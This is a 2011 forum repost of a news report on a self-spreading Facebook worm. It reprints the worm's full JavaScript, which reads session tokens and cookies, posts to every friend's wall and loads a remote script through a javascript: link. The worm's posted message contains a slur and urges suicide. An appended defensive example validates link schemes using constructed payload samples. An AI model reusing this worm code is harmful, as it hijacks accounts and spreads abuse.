Nytro, posted May 12, 2011

Script that gives hackers access to user accounts floods Facebook

A widespread hack spread across Facebook early Thursday morning and shows no signs of abating as of yet. It comes in the form of a script that posts heavily profanity-laden wall posts continuously, instructing you that the only way to remove the posts is to click a 'Remove This App' link.

Unfortunately the link is a hoax and allows the malicious script to access your Facebook account. Your account will then continue to spread the script in the form of similarly formatted wall posts on your friends' accounts.

The message uses the phrase 'Vote for Nicole Santos', leading some to believe that it is a high school prank related to prom season.

Here is a link (Pastebin.com) to the raw code of the script causing the problems on Facebook. If any of you commenters have any suggestions as to how this might have been injected in the first place, please do let us know.

Script:

var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.";
// Payload behind the "Remove This App" link: a javascript: URL that injects a remote script into the page.
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "Remove This App";
// Anti-CSRF tokens and the logged-in user id, read from the victim's own page and cookie.
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
// Fetch the victim's friend list from the typeahead endpoint (synchronous request).
gf = new XMLHttpRequest();
gf.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&" + Math.random(), false);
gf.send();
if (gf.readyState != 4) {
} else {
  // Strip the 9-character "for (;;);" anti-JSON-hijacking prefix before evaluating the response.
  data = eval('(' + gf.responseText.substr(9) + ')');
  if (data.error) {
  } else {
    friends = data.payload.entries.sort(function(a, b) { return a.index - b.index; });
  }
}
// Post the message, with the javascript: action link, to every friend's wall.
for (var i = 0; i < friends.length; i++) {
  var httpwp = new XMLHttpRequest();
  var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
  var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message;
  httpwp.open("POST", urlwp, true);
  httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  httpwp.setRequestHeader("Content-length", paramswp.length);
  httpwp.setRequestHeader("Connection", "keep-alive");
  httpwp.onreadystatechange = function() {
    if (httpwp.readyState == 4 && httpwp.status == 200) {
    }
  };
  httpwp.send(paramswp);
}
alert("Failed to remove. Go fuck yourself with a cactus.");
document.location = "profile.php?id=100000583908715";

Unsurprisingly, many are trying to trace the source back to the 'Nicole Santos' that may have originated it, although it's unclear whether this person would be the originator or just a victim of the hack.

As of now the only solution seems to be not to click on the link or any link requiring that you 'Verify your account to prevent spam', as this may be how the hack gains access to your Facebook wall in the first place. Simply block the friend sending it to you, as their account is now compromised. Once the problem has been fixed by Facebook you can re-enable them.

We will continue to update you on the hack and its effects; check back with this post for more information.

Source: Script that gives hackers access to user accounts floods Facebook ! ~ THN : The Hackers News
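Added example, not part of the original post and not Facebook's code: the worm's "Remove This App" link is a javascript: URL sent as the feed_info[action_links][0][href] parameter, so the platform's wall rendered a user-supplied link target whose scheme runs code in the viewer's session. The check below is the kind of scheme allow-list a server (or a client rendering user-supplied links) can apply to such targets. It uses the WHATWG URL parser so that case variants, embedded tabs and leading whitespace resolve the way a browser would before the scheme is compared. The sample hrefs are constructed; the remote-script host in the first one is the reserved placeholder example.invalid, not the worm's real URL.

```javascript
// Only plain web links are allowed as user-supplied action-link targets.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns true only when href parses as an absolute URL with an allowed scheme.
// Browsers drop ASCII tab/newline and leading/trailing C0 controls before
// parsing a URL, so the same normalisation is applied here; otherwise
// "java\tscript:" would slip past a naive prefix check yet run in the browser.
function isSafeHref(href) {
  if (typeof href !== "string") return false;
  const cleaned = href.replace(/[\u0000-\u001F\u007F]/g, "").trim();
  let url;
  try {
    url = new URL(cleaned); // throws on relative or malformed input
  } catch (e) {
    return false; // reject relative links too: resolve them against a known base first
  }
  return ALLOWED_SCHEMES.has(url.protocol); // protocol is lower-cased by the parser
}

// Constructed sample inputs: the worm's href shape plus common evasions, and two benign links.
const SAMPLES = [
  "javascript:(function(){s=document.createElement('script');s.src='http://example.invalid/verify.js';document.getElementsByTagName('head')[0].appendChild(s);})();",
  "JaVaScRiPt:alert(1)",
  "  javascript:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "vbscript:MsgBox(1)",
  "https://www.facebook.com/apps/application.php?id=6628568379",
  "http://example.invalid/remove",
];

// Classifies each sample; used to show which of the worm-style targets are rejected.
function classify(samples = SAMPLES) {
  return samples.map((href) => ({ href, safe: isSafeHref(href) }));
}

for (const r of classify()) {
  console.log((r.safe ? "ALLOW " : "REJECT") + "  " + r.href);
}
```

The allow-list is deliberately on schemes rather than a block-list of "javascript:" spellings; data:, vbscript: and any future scheme fall out automatically, and a relative link is rejected rather than guessed at, since whether it is safe depends on the base it would resolve against.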